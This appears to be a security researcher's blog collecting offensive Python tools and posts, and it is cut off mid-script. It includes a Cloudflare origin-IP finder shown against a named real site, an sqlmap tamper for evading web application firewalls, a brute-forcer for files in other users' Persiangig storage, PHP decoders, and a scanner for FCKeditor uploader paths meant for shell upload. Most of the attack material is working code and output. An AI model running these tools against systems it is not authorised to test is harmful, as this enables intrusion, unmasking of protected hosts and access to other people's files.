Senior Security Researcher · Cybersecurity Specialist · Application Security Engineer · DevSecOps · Software Engineer
2019-04-12
OWASP Honeypot
In our first test of the OWASP Honeypot with Ali Razmjoo, I would say that, of all the attacks we are receiving, the Russians are doing it smarter and more effectively.
API: http://ohp-stockholm-live.z3r0d4y.com:5000/
API Docs: https://github.com/zdresearch/OWASP-Honeypot/wiki
Black Hat Asia 2019
Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.
The OWASP Nettacker project was created to automate information gathering and vulnerability scanning, and eventually to generate a report for a network covering its services, bugs, vulnerabilities, misconfigurations and other findings. The software uses TCP SYN, ACK, ICMP and many other protocols to detect services and to evade firewall/IDS/IPS devices. Its method for discovering protected services and devices such as SCADA gives it a competitive edge over other scanners.
https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336
The Black Hat photographer has uploaded some pictures to Flickr; you can check them out here: https://www.flickr.com/photos/blackhatevents/albums/72157707843897024
2018-11-10
Bypass Cloudflare To Get Real IP Address
What is Cloudflare
Cloudflare is one of the fastest-growing CDN providers, with free and premium plans to accelerate, optimize and secure websites. More than 2,000,000 web properties are powered by Cloudflare, and I use their service too. If you already use Cloudflare, you may have noticed that a DNS lookup of your domain returns Cloudflare's addresses rather than your server's.
How this script works
This script is designed to discover the origin IP of a server that sits behind Cloudflare. It does so by probing the domain's name servers: for each common private name-server prefix (listed below) it builds a hostname such as ns1.example.com, resolves it, and checks whether ports 53 and 80 are open. It therefore only works for domains whose authoritative (private) name servers run on the origin host itself; where such a name server exists, its address is the origin server's IP.
Example NS
ns1, ns2, ns3, ns4, primary, host1, host2, masterdns, slavedns, dns1, dns2, master, slave, node1, node2
Ping Test
Pinging the domain only shows a Cloudflare edge address (172.64.197.10 lies in Cloudflare's 172.64.0.0/13 range), not the origin:
```text
C:\Users\root>ping cafeigapp.com

Pinging cafeigapp.com [172.64.197.10] with 32 bytes of data:
Reply from 172.64.197.10: bytes=32 time=153ms TTL=60
Reply from 172.64.197.10: bytes=32 time=150ms TTL=60
Reply from 172.64.197.10: bytes=32 time=149ms TTL=60
Reply from 172.64.197.10: bytes=32 time=155ms TTL=60

Ping statistics for 172.64.197.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 149ms, Maximum = 155ms, Average = 151ms
```
Cloudflare Bypasser script result: the script found ns1 and ns2 of the domain answering on ports 53 and 80, so the real (origin) IP is 144.76.174.208:
```text
Enter your domain: cafeigapp.com
Starting...

[+] Open    ns1.cafeigapp.com    53    144.76.174.208
[+] Open    ns1.cafeigapp.com    80    144.76.174.208
[+] Open    ns2.cafeigapp.com    53    144.76.174.208
[+] Open    ns2.cafeigapp.com    80    144.76.174.208
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.

[*] Finished!
```
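The check the procedure above leaves out, as an added example (my own code, not part of the original post or the script it links): after resolving a candidate name-server hostname, confirm that the address is not itself inside Cloudflare's published ranges, otherwise a "found" host may just be another proxied name. The resolver is injectable, so the demo runs offline against a constructed answer table that mirrors the cafeigapp.com result; the Cloudflare range list is a snapshot of https://www.cloudflare.com/ips-v4 and is assumed to need refreshing before real use.

```python
import ipaddress
import socket
import sys

# Snapshot of Cloudflare's published IPv4 ranges (https://www.cloudflare.com/ips-v4).
# Assumption: this list drifts over time; refresh it before relying on it.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# The same private name-server prefixes the page's script tries.
NS_PREFIXES = ("ns1", "ns2", "ns3", "ns4", "primary", "host1", "host2", "masterdns",
               "slavedns", "dns1", "dns2", "master", "slave", "node1", "node2")


def is_cloudflare(ip):
    """True when ip sits inside a Cloudflare edge range, i.e. it is not an origin."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def candidate_hosts(domain):
    return ["%s.%s" % (p, domain) for p in NS_PREFIXES]


def find_origin_candidates(domain, resolve=socket.gethostbyname):
    """Resolve every candidate hostname and keep only addresses outside Cloudflare.

    resolve(hostname) -> ip is injectable so the logic can run without network access."""
    found = {}
    for host in candidate_hosts(domain):
        try:
            ip = resolve(host)
        except (socket.gaierror, KeyError):   # NXDOMAIN (or missing from the offline table)
            continue
        if not is_cloudflare(ip):
            found[host] = ip
    return found


# Constructed offline stand-in for DNS: mirrors the page's cafeigapp.com output plus one
# hostname that resolves straight back into Cloudflare (a false lead the script would print).
FAKE_DNS = {
    "ns1.cafeigapp.com": "144.76.174.208",
    "ns2.cafeigapp.com": "144.76.174.208",
    "host1.cafeigapp.com": "172.64.197.10",
}


def demo():
    return find_origin_candidates("cafeigapp.com", resolve=FAKE_DNS.__getitem__)


if __name__ == "__main__":
    hits = find_origin_candidates(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for host, ip in sorted(hits.items()):
        print("[+] %-40s %s (outside Cloudflare ranges)" % (host, ip))
```

Run it with a domain argument to use real DNS; without one it replays the offline table. A candidate that survives this filter still needs confirming, for example by requesting the site directly from that IP with the Host header set to the domain and comparing the response with the Cloudflare-fronted one.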
Cloudflare Bypasser Script:
Download script
```python
'''
File name: Bypass Cloudflare To Get Real IP Address
Author: Dariush Nasirpour (Net.Edit0r)
Date created: 11/10/2018
Web: http://nasirpour.info
Special Thanks to Ehsan Nezami
'''
import socket

socket.setdefaulttimeout(1)

# Common private name-server prefixes; each one is tried as <prefix><domain>
dns = ["ns1.", "ns2.", "ns3.", "ns4.", "primary.", "host1.", "host2.", "masterdns.",
       "slavedns.", "dns1.", "dns2.", "master.", "slave.", "node1.", "node2."]

domain = raw_input("Enter your domain: ")
try:
    print "Starting...\n\r"
    for dns_name in dns:
        remoteServerIP = dns_name + domain
        for port in [53, 80]:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                IP = socket.gethostbyname(remoteServerIP)
                # connect_ex returns 0 when the TCP handshake succeeds
                result = sock.connect_ex((remoteServerIP, port))
                if result == 0:
                    print "[+] Open\t{:<50}{:<3}\t{}".format(remoteServerIP, port, IP)
            except socket.gaierror:
                print "[-] Hostname could not be resolved."
            except socket.error:
                print "[-] Couldn't connect to server"
            finally:
                sock.close()   # the original only closed the socket on an open port
    print "\n[*] Finished!"
except KeyboardInterrupt:
    print "You pressed Ctrl+C"
```
2018-11-09
PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR"
This script will help you to decode files coded as "Encoding by TeleAgent.IR - ResellerCenter.IR".
For a more detailed look, here is the header of an encoded file:
```php
<?php //MS4w
/*
---------------------------------------------------------------------------------
- PHP Encoding by TeleAgent.IR - ResellerCenter.IR                              -
- PHP Encoder Version : 1.0                                                     -
- This code was created on : 2018/10/01 at 13:00                                -
- Checksum : 6fj65a682a445d8cb5734720ed67dae2                                   -
----------------------------------------------------------------------------------
*/
$_CLHHKEE=__FILE__;$_NQRSZPKB=__LINE__;$_CHDAOJMPYXT=__DIR__ ;$_FNMHVDO=__FUNCTION__;
function I1IIIIIII11I1II() {return __CLASS__;}function I1IIIIIII() {return __LINE__;}
$_CSYPWGZ=__CLASS__;$_TTBLNSD=__TRAIT__ ;$_MDGRSQS=__METHOD__ ;$_NEVYW=__NAMESPACE__;
function I1IIIIIII1II() {return __FUNCTION__;}function I1I1IIII() {return __TRAIT__;}
function I1IIIIIII11I11II() {return __FILE__;}function I1III1IIII() {return __DIR__;}
function I1III11I1I() {return __METHOD__;}function I1II1III() {return __NAMESPACE__;}
$_QXXCZD="\142\141\163\x65\x36\64\137\144\145\x63\157\x64\145";@echo("?>".$_QXXCZD("PD9waHAgJF9.
```
Download script
To use this script, just run it and give it the path to your PHP files.
Enjoy.
```python
'''
File name: PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR".py
Author: Ehsan Nezami
Date created: 19/11/2018
Web: http://nezami.me/
Python Version: 2.7
'''
import os
import re
import base64
import zlib


def listFiles(path, extension):
    return [f for f in os.listdir(path) if f.endswith(extension)]


# Each layer of the encoder wraps the previous one as  $_NAME("<base64>"));  these are the
# variable names this encoder version uses, outermost first.
LAYERS = [
    ('$_QXXCZD("', '"));'),
    ('.$_ZUI("', '"));'),
    ('$_IRRGRHMF("', '"));'),
    ('$_EFTYPYA("', '"));'),
    ('$_AOKDOJCRH("', '"));'),
]
# innermost layer: gzinflate(base64_decode("..."))
LAST_START, LAST_END = '$_NZHLDCOUMASYWHUKYETFVEDDJELK("', '")));'


def decode_layer(text, start, end):
    """Return the base64-decoded payloads found between the start and end markers."""
    return [base64.b64decode(x) for x in re.findall(re.escape(start) + "(.*)" + re.escape(end), text)]


path_name = raw_input("What is your path of php files? \n Example : C:\\files\\ \n ")
for name in listFiles(path_name, '.php'):
    print name
    # the original opened the bare file name, which only works when run inside that directory
    with open(os.path.join(path_name, name), 'r') as f:
        for line in f.readlines():
            payloads = [line]
            for start, end in LAYERS:
                payloads = [p for text in payloads for p in decode_layer(text, start, end)]
            for text in payloads:
                for compressed in decode_layer(text, LAST_START, LAST_END):
                    decoded = zlib.decompress(compressed, -15)   # raw DEFLATE, as PHP gzinflate()
                    print decoded
                    with open('dec-' + name, 'a') as output:
                        output.write(decoded)
```
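The script hard-codes the six variable names of this encoder version, so a file produced by a build that renamed them decodes nothing. As an added example (my own code, not the decoder above), the function below generalises the same idea: find any `$_NAME("...")` wrapper, base64-decode it, repeat until none is left, and gzinflate the innermost payload. It also expands PHP octal/hex escapes, which is how the stub's `"\142\141\163..."` string turns back into `base64_decode`. The sample file it decodes is constructed inline in the same shape; the variable names used there are copied from the regexes above and are otherwise an assumption.

```python
import base64
import os
import re
import sys
import zlib

MAX_DEPTH = 64

# One wrapper layer looks like  $_NAME("<base64>"))  ; capturing only base64 characters avoids the
# greedy (.*) over-match the per-layer regexes above would suffer on a line with several calls.
LAYER_RE = re.compile(rb'\$_[A-Z]+\("([A-Za-z0-9+/=]+)"\)')


def php_unescape(s):
    """Expand PHP double-quoted \\ooo and \\xHH escapes (reveals the hidden function name)."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})', repl, s)


def unwrap(blob):
    """Peel base64 layers until none is left. Returns (plain_source, layers_removed).

    The innermost layer is gzinflate(base64_decode(...)), so once the decoded bytes contain
    no further wrapper they are inflated as a raw DEFLATE stream (wbits=-15)."""
    for depth in range(MAX_DEPTH):
        m = LAYER_RE.search(blob)
        if m is None:
            return blob, depth
        decoded = base64.b64decode(m.group(1))
        if LAYER_RE.search(decoded) is None:
            try:
                decoded = zlib.decompress(decoded, -15)
            except zlib.error:
                pass                     # innermost layer was plain base64 after all
        blob = decoded
    raise ValueError("more than %d layers, giving up" % MAX_DEPTH)


def build_sample(source):
    """Constructed test input in the shape of the encoder's output (not a real protected file)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    inner = base64.b64encode(c.compress(source) + c.flush())
    blob = b'<?php $_NZHLDCOUMASYWHUKYETFVEDDJELK("' + inner + b'")));'
    for name in (b"AOKDOJCRH", b"EFTYPYA", b"IRRGRHMF", b"ZUI", b"QXXCZD"):
        blob = b'<?php $_' + name + b'("' + base64.b64encode(blob) + b'"));'
    return blob


if __name__ == "__main__":
    for name in sys.argv[1:]:
        with open(name, "rb") as fh:
            plain, layers = unwrap(fh.read())
        target = os.path.join(os.path.dirname(name), "dec-" + os.path.basename(name))
        with open(target, "wb") as out:
            out.write(plain)
        print("%s: %d layer(s) removed, %d bytes -> %s" % (name, layers, len(plain), target))
```

Pass one or more encoded files on the command line; each is written next to the original with a `dec-` prefix. Because the wrapper regex is keyed on the `$_NAME("base64")` shape rather than on specific names, it keeps working when the encoder shuffles its identifiers, and the depth limit stops a crafted file from looping forever.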
2018-11-08
Random Session (Sqlmap Tamper)
sqlmap is an automatic SQL injection and database takeover tool.
This tamper script can be used to bypass some web application firewalls by sending a fresh random session cookie with every request.
Download script
```python
#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission

author: 3H34N(nezami.me)
"""
import string
import random

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def randomsession():
    # 32 random characters from [a-z0-9], in the shape of a PHP session id
    length = 32
    chars = string.ascii_lowercase + string.digits
    password = ''.join(random.choice(chars) for i in range(length))
    return "PHPSESSID=" + password


def tamper(payload, **kwargs):
    """
    Append a random session HTTP header 'PHPSESSID' to bypass WAF (usually application based) protection

    Note: this replaces the whole Cookie header, so any cookie given with --cookie is dropped for that request
    """
    headers = kwargs.get("headers", {})
    headers["Cookie"] = randomsession()
    return payload
```
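One thing to know before using it, shown as an added example (my own code, not the tamper above or anything from sqlmap): `headers["Cookie"] = ...` replaces the whole Cookie header, so a session cookie passed with `--cookie` for authenticated testing is silently dropped from every tampered request. The `tamper` below rotates PHPSESSID the same way but merges it into the existing cookies; `tamper_clobber` reproduces the page's behaviour for comparison, and the `lib.core.enums` import is made optional so the file also runs outside sqlmap's tamper/ directory.

```python
import random
import string

try:                                   # available when the file lives in sqlmap's tamper/ directory
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:                    # stand-alone run: sqlmap is not on the path
    __priority__ = 0


def dependencies():
    pass


def random_phpsessid(length=32):
    """32 chars from [a-z0-9], the same shape the page's tamper produces."""
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'} (insertion order preserved)."""
    cookies = {}
    for part in value.split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name] = val
    return cookies


def tamper_clobber(payload, **kwargs):
    """Behaviour of the tamper on this page: the whole Cookie header is replaced."""
    headers = kwargs.get("headers", {})
    headers["Cookie"] = "PHPSESSID=" + random_phpsessid()
    return payload


def tamper(payload, **kwargs):
    """Rotate PHPSESSID on every request but keep every other cookie (e.g. the one from --cookie)."""
    headers = kwargs.get("headers", {})
    cookies = parse_cookie_header(headers.get("Cookie", ""))
    cookies["PHPSESSID"] = random_phpsessid()
    headers["Cookie"] = "; ".join("%s=%s" % kv for kv in cookies.items())
    return payload


def demo():
    """Run both variants on a request carrying an auth cookie; return what each would send,
    plus whether two consecutive merged requests got different session ids."""
    clobbered = {"Cookie": "auth=abc123; theme=dark"}
    merged = {"Cookie": "auth=abc123; theme=dark"}
    tamper_clobber("1 AND 1=1", headers=clobbered)
    tamper("1 AND 1=1", headers=merged)
    first = parse_cookie_header(merged["Cookie"])["PHPSESSID"]
    tamper("1 AND 1=2", headers=merged)
    second = parse_cookie_header(merged["Cookie"])["PHPSESSID"]
    return parse_cookie_header(clobbered["Cookie"]), parse_cookie_header(merged["Cookie"]), first != second


if __name__ == "__main__":
    lost, kept, rotated = demo()
    print("page's tamper sends:  ", lost)
    print("merging tamper sends: ", kept, "(rotated: %s)" % rotated)
```

Drop the file into sqlmap's tamper/ directory and select it with `--tamper=<name>`; the `payload` argument is returned untouched because this tamper only changes headers. A WAF that keys its per-session counters on PHPSESSID sees a new session each time, while the application's own `auth` cookie still rides along.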
2015-11-30
Persiangig File Finder
This script helps you brute-force file and directory names on Persiangig storage accounts.
If you want better results, you can edit or replace the dictionary list (list.txt) yourself.
Note: read the Usage (option 3 in the menu).
Enjoy!
Click Here To Download
```python
import urllib2
import curses
import sys
import os


def get_param(prompt_string):
    """Brings up new screen asking user to enter a single parameter.

    Args:
        prompt_string: Prompt which asks/tells user what to enter (string).
    """
    screen.clear()
    screen.border(0)
    screen.addstr(2, 2, prompt_string)
    screen.refresh()
    input = screen.getstr(10, 10, 60)
    return input


def find_files(types, session, username):
    # Try every word in list.txt as <word><types> on the user's persiangig storage
    print "\n"
    f = open('list.txt', 'r')
    print "Starting...\n"
    for dic in f:
        try:
            req = urllib2.Request('http://%s.persiangig.com/%s%s/download?%s' % (str(username), (dic).rsplit()[0], str(types), str(session)))
            response = urllib2.urlopen(req)
            the_page = response.read()
            if "pg100.png" not in the_page:        # pg100.png appears on persiangig's not-found page
                if "۰ b" not in the_page:         # a zero-byte ("۰ b") answer means the session is stale
                    print "File [" + dic.rsplit()[0] + types + "] Found !"
                    ff = open('success.txt', 'a')
                    ff.write(dic.rsplit()[0] + types + '\n')
                    ff.close()
                else:
                    print '[', dic.rsplit()[0], '] Session expired'
                    session = raw_input("session: ").rsplit()[0]
        except:
            print "err url"
    f.close()


def find_dirs(username):
    # Try every word in list.txt as a directory name under the user's subdomain
    print "\n"
    f = open('list.txt', 'r')
    print "Starting...\n"
    for dic in f:
        try:
            req = urllib2.Request('http://%s.persiangig.com/%s' % (str(username), (dic).rsplit()[0]))
            response = urllib2.urlopen(req)
            the_page = response.read()
            if "pg100.png" not in the_page:
                print "Directory [" + dic.rsplit()[0] + "] Found !"
                ff = open('success-dir.txt', 'a')
                ff.write(dic.rsplit()[0] + '\n')
                ff.close()
        except:
            print "err url"
    f.close()


def info():
    os.system('cls')
    print "Persiangig file and directory finder through the list!"
    print "\n\t"
    print "you have URL like : \nhttp://hacker.persiangig.com/file.rar/download?010d\n\n"
    print "value will be :\nhttp://[username].persiangig.com/[file type]/download?[session]"
    print "\n\t\t\t\t\t\n"


x = 0
while x != ord('4'):
    screen = curses.initscr()
    curses.start_color()  # Must call this before creating pairs.
    # Create hardcoded color pairs (foreground/background) to use:
    #curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
    #curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_WHITE)
    #curses.init_pair(3, curses.COLOR_RED, curses.COLOR_BLACK)
    screen.clear()
    screen.border(0)
    screen.addstr(screen.getmaxyx()[0] - 1, 1, "Copyright ITSecZone co. (http://www.nezami.info)")
    screen.addstr(2, 2, "Please enter a number...")
    screen.addstr(4, 4, "1 - Directory Finder")
    screen.addstr(5, 4, "2 - File Finder")
    screen.addstr(6, 4, "3 - Usage")
    screen.addstr(7, 4, "4 - Exit")
    screen.refresh()
    x = screen.getch()
    if x == ord('1'):
        try:
            username = get_param('Enter your username of persiangig: ').rsplit()[0]
        except:
            sys.exit("err user input!")
        curses.endwin()
        find_dirs(username)
        raw_input('Press enter (to return to main)')
    if x == ord('2'):
        try:
            types = get_param('Enter your types of file name:\n Example : .rar or .zip ... ').rsplit()[0]
            session = get_param('Enter your session name:\n Session must be in 4 digit end of url ').rsplit()[0]
            username = get_param('Enter your username:\nUsername of persiangig. ').rsplit()[0]
        except:
            sys.exit("err user input!")
        curses.endwin()
        find_files(types, session, username)
        raw_input('Press enter (to return to main)')
    if x == ord('3'):
        curses.endwin()
        info()
        raw_input('Press enter (to return to main)')
curses.endwin()
```
2015-11-21
International CTF: we ranked 11th
Hack Dat Kiwi (Kiwi CTF)
Hack Dat Kiwi is a new CTF franchise designed by security researchers and hackers with the aim of creating quality challenges that the participants enjoy solving. We do not put puzzles in our CTFs, and the challenges are designed for those who really know what they are doing, and not tool junkies.
Cash prize for overall winners and category winners.
Crypto/Forensics, RE/Exploit, Web, Forensics, Experimental.
Country-based hacker rankings will be available after the CTF on brag.dat.kiwi! It will stay online and preserve your right to brag.
Our team ranked 11th.
2015-08-04
PHP Law Decoding!
Decode PHP code carrying the signature: [protected by law]
I wrote a script to reverse it.
```php
<?php
// Send the charset header before any output (the original called header() after the HTML, which fails once output has started)
header('Content-Type: text/html; charset=utf-8');
?>
<style type="text/css">
*{
    background-color: #F7F3E8;
    border: 2px solid #e3e3e3;
    border-radius: 8px 8px 8px 8px;
    margin-bottom: 5px;
    padding: 5px;
}
TD{font-family: Tahoma; font-size: 10pt;}
input,select,textarea{
    border:0;
    border:1px solid #900;
    color:#fff;
    background:#000;
    margin:0;
    padding:2px 4px;
}
input:hover,textarea:hover,select:hover{
    background:#200;
    border:1px solid #f00;
}
.red{ color:#f00; }
.white{ color:#fff; }
a{ text-decoration:none; }
a:hover{
    border-bottom:1px solid #900;
    border-top:1px solid #900;
}
#result a{ color:#777; }
.sign{ color:#222; }
#box{ margin:10px 0 0 0; }
</style>
<html>
<body>
<center><br>
<title>PHP Law DECODER BY #BHG[3H34N]</title>
<font size='3' color='#bbbbbb'>PHP Law DECODER BY #BHG[3H34N]</font><br><br>
<font size='3' color='#bbbbbb'>WebSite:<b><a href="http://nezami.info">nezami.info</a></b><br/></font><br/>
<font size='2' color='#bbbbbb'>Email:<font size='2' color='red'>me@nezami.info</font></font><br/><br/>
<font size='3' color='#bbbbbb'> Example:<font size='2' color='green'>/* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */ </font></font><br><br>
<font size='3' color='#bbbbbb'>$o=<font size='2' color='green'><U>Copy This Part Of Your Code To Text Box & Press DeCode</U>;eval(base64_decode("Li4ud3d3LmJsYWNrLWhnLm9yZyBDb3B5IFJpZ2h0IEZvcjNIMz ROIC4uLi=="));return;?></font></font><br><br>
<form name="form" method="post">
<textarea name="text" cols=100 rows=20></textarea>
<input type="hidden" name="status" id="status" value="1">
<br/>
<div class="submit"><br>
<input alt="DeCode" title="Send" type="image"><br>
</div>
</form>
<?php
if (isset($_POST['text']) && isset($_POST['status'])) {
    // magic_quotes is gone since PHP 5.4; keep the check only where the function still exists
    $text = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) ? stripslashes($_POST['text']) : $_POST['text'];

    // The protected blob is base64( [1 header byte][16-bit flag word][LZSS tokens ...] ), with every
    // output byte XORed with 0x07. The names below replace the $l/$ll/$lll... names of the original
    // stub; the logic is unchanged.
    $in    = base64_decode($text);
    $len   = strlen($in);
    $out   = array();     // decoded bytes (must be an array: writing offsets into "" breaks on PHP >= 7.1)
    $o     = 0;           // output position
    $i     = 3;           // input position; byte 0 is never read
    $flags = (ord($in[1]) << 8) + ord($in[2]);
    $bits  = 16;          // flag bits left in $flags
    for (; $i < $len;) {
        if ($bits == 0) {                           // next group of 16 tokens: read a new flag word
            $flags  = (ord($in[$i++]) << 8);
            $flags += ord($in[$i++]);
            $bits   = 16;
        }
        if ($flags & 0x8000) {                      // token is a back-reference or a run
            $offset  = (ord($in[$i++]) << 4);
            $offset += (ord($in[$i]) >> 4);         // 12-bit offset
            if ($offset) {                          // copy (4-bit length + 3) bytes from $o - $offset, overlap allowed
                $count = (ord($in[$i++]) & 0x0f) + 3;
                for ($k = 0; $k < $count; $k++)
                    $out[$o + $k] = $out[$o - $offset + $k];
                $o += $count;
            } else {                                // offset 0: repeat one byte (16-bit count + 16) times
                $count  = (ord($in[$i++]) << 8);
                $count += ord($in[$i++]) + 16;
                for ($k = 0; $k < $count; $out[$o + $k++] = ord($in[$i]))
                    ;
                $i++;
                $o += $count;
            }
        } else {                                    // literal byte
            $out[$o++] = ord($in[$i++]);
        }
        $flags <<= 1;
        $bits--;
    }
    // Un-XOR and wrap the way the original eval'd string did: "?>" ... "<?"
    $plain = '';
    for ($k = 0; $k < $o; $k++) {
        $plain .= chr($out[$k] ^ 0x07);
    }
    $result = '?' . chr(62) . $plain . chr(60) . '?';
    // htmlspecialchars: decoded code containing </textarea> must not break out of the box (XSS in the decoder itself)
    echo 'DECODED: <br/><textarea cols=100 rows=20>' . htmlspecialchars("'$result';" . PHP_EOL) . '</textarea><br/>';
}
?>
</center>
</body>
<font size='3' color='#bbbbbb'><b><a href="http://nezami.info">#3H34N</a></b></font>
</html>
```
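As an added example (my own Python port, not the page's code), here is the same decoding loop with readable names, plus a matching encoder so the format can be exercised end to end: base64 over a one-byte header the decoder never reads (assumed to be a version byte), a 16-bit flag word before each group of 16 tokens, 2-byte LZSS back-references (12-bit offset, 4-bit length plus 3), 4-byte run tokens (offset 0, 16-bit count plus 16, one value byte), and every output byte XORed with 0x07. The encoder is written here only to produce test vectors; nothing on the page shows the obfuscator's own encoder, and the naive match search is fine for test-sized input only.

```python
import base64

WINDOW = 4095        # 12-bit back-reference offset
MAX_MATCH = 18       # 4-bit length field + 3
MAX_RUN = 4095 + 16  # 12-bit run-length field + 16
XOR_KEY = 0x07       # every decompressed byte is XORed with this


def law_decode(b64):
    """Port of the page's PHP loop: byte 0 is ignored, bytes 1-2 hold the first 16-bit flag word,
    then tokens follow; flag bit set = back-reference/run, clear = literal."""
    data = base64.b64decode(b64)
    if len(data) < 3:
        return b""
    out, n, i = bytearray(), len(data), 3
    flags, bits = (data[1] << 8) | data[2], 16
    try:
        while i < n:
            if bits == 0:                         # next group of 16 tokens: reload the flag word
                flags, i, bits = (data[i] << 8) | data[i + 1], i + 2, 16
            if flags & 0x8000:
                b0, b1 = data[i], data[i + 1]
                offset = (b0 << 4) | (b1 >> 4)
                if offset:                        # 2-byte token: copy (len+3) bytes from offset back (overlap ok)
                    for _ in range((b1 & 0x0F) + 3):
                        out.append(out[-offset])
                    i += 2
                else:                             # 4-byte token: 00 hi lo value -> value repeated (hi<<8|lo)+16 times
                    out.extend(bytes([data[i + 3]]) * (((b1 << 8) | data[i + 2]) + 16))
                    i += 4
            else:                                 # literal byte
                out.append(data[i])
                i += 1
            flags, bits = (flags << 1) & 0xFFFF, bits - 1
    except IndexError:
        raise ValueError("truncated token stream")
    return bytes(b ^ XOR_KEY for b in out)


def law_encode(plain):
    """Greedy encoder for the same token format, written only to produce test vectors."""
    data = bytes(b ^ XOR_KEY for b in plain)
    n, i, tokens = len(data), 0, []              # tokens: (flag_bit, encoded_bytes)
    while i < n:
        run = 1
        while i + run < n and data[i + run] == data[i] and run < MAX_RUN:
            run += 1
        if run >= 16:                             # run token: 00, (run-16)>>8, (run-16)&0xFF, value
            tokens.append((1, bytes([0, (run - 16) >> 8, (run - 16) & 0xFF, data[i]])))
            i += run
            continue
        best_len = best_off = 0
        for j in range(max(0, i - WINDOW), i):    # naive match search (quadratic, test-sized input only)
            k = 0
            while k < MAX_MATCH and i + k < n and data[j + k] == data[i + k]:
                k += 1
            if k > best_len:
                best_len, best_off = k, i - j
        if best_len >= 3:                         # match token: offset>>4, (offset&0xF)<<4 | (len-3)
            tokens.append((1, bytes([best_off >> 4, ((best_off & 0x0F) << 4) | (best_len - 3)])))
            i += best_len
        else:
            tokens.append((0, data[i:i + 1]))
            i += 1
    out = bytearray([0x00])                       # byte 0: never read by the decoder (assumed version byte)
    for g in range(0, max(len(tokens), 1), 16):   # one 16-bit flag word precedes each group of 16 tokens
        group = tokens[g:g + 16]
        flags = sum(bit << (15 - idx) for idx, (bit, _) in enumerate(group))
        out += bytes([flags >> 8, flags & 0xFF])
        for _, tok in group:
            out += tok
    return base64.b64encode(bytes(out)).decode()


def raw_size(b64):
    """Size of the binary stream behind a base64 blob (to check the encoder actually compresses)."""
    return len(base64.b64decode(b64))


if __name__ == "__main__":
    sample = b'<?php echo "protected by law"; ?>'
    blob = law_encode(sample)
    print(blob)
    print(law_decode(blob))
```

To decode a real file, paste the `$o=` base64 string into `law_decode`; the PHP tool above wraps the result in `?>` and `<?` because the original obfuscated file evals it inside an open PHP block. The hand-built vector `AAAAb24=` (header, zero flag word, two literals) decodes to `hi`, which is a quick way to check a port of the loop.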
FCKeditor finder for upload shell
Many FCKeditor installations are vulnerable to shell upload through paths like the examples below:
With this script you can find the common uploader paths used by FCKeditor installs.
I tried to collect all of the paths that matter and are used most, and I wrote this script to find them, even when access to them is restricted.
Download script
```text
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
```
```python
import urllib2
import socket
import cookielib
import sys
import re
import os

socket.setdefaulttimeout(10)

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

if len(sys.argv) <= 1:
    print "\n|----------------------------------------------|"
    print "| - FCKeditor Finder - |"
    print "| Usage: FCKditorFinder.py sites_list.txt |"
    print "| https://nezami.me |"
    print "|----------------------------------------------|\n"
    sys.exit(1)

# Common FCKeditor / TinyMCE / asset-manager install paths, appended to every site in the list
# (two missing commas in the original silently glued neighbouring entries together)
dirs = ['fckeditor', 'FCKeditor', 'include/fckeditor', 'includes/fckeditor', 'admin/fckeditor',
        'fck/fckeditor', 'fck3ditor/fckeditor', 'editor/fckeditor', 'filemanager/fckeditor',
        'plugins/fckeditor', 'FCKeditor/fckeditor', 'TVS/FCKeditor', 'forum/fckeditor',
        'forums/fckeditor', 'home/fckeditor', 'shcsAdmin/fckeditor',
        'wspro/html/js/editor/fckeditor/', 'html/js/editor/fckeditor/', 'scripts/ajax/FCKeditor/',
        'CFIDE/scripts/ajax/FCKeditor/', 'CMSAdminControls/FCKeditor/', 'mambots/editors/fckeditor/',
        'webspace/html/js/editor/fckeditor/', 'resources/fckeditor/', 'jphoto/fckeditor/',
        'sysadmin/utils/FCKeditor/', 'templates/fckeditor/', 'fcnews/fckeditor/', 'js/fckeditor/',
        '/sites/all/modules/fckeditor/', 'admin/classes/components/formattedTextArea/fckeditor/',
        'admin/panel/fckeditor/', 'cfscripts/ajax/FCKeditor/', 'ECP/fsboard/fckeditor/',
        'sadmin/FCKeditor/', 'index/class/xoopseditor/fckeditor/', 'arti/outils/fckeditor/',
        'Common/Scripts/fckeditor', 'jmcmurra/generators/inc/fckeditor',
        'admin/view/javascript/fckeditor', 'editors/FCKeditor/', 'ModernDeckDepot/fckeditor',
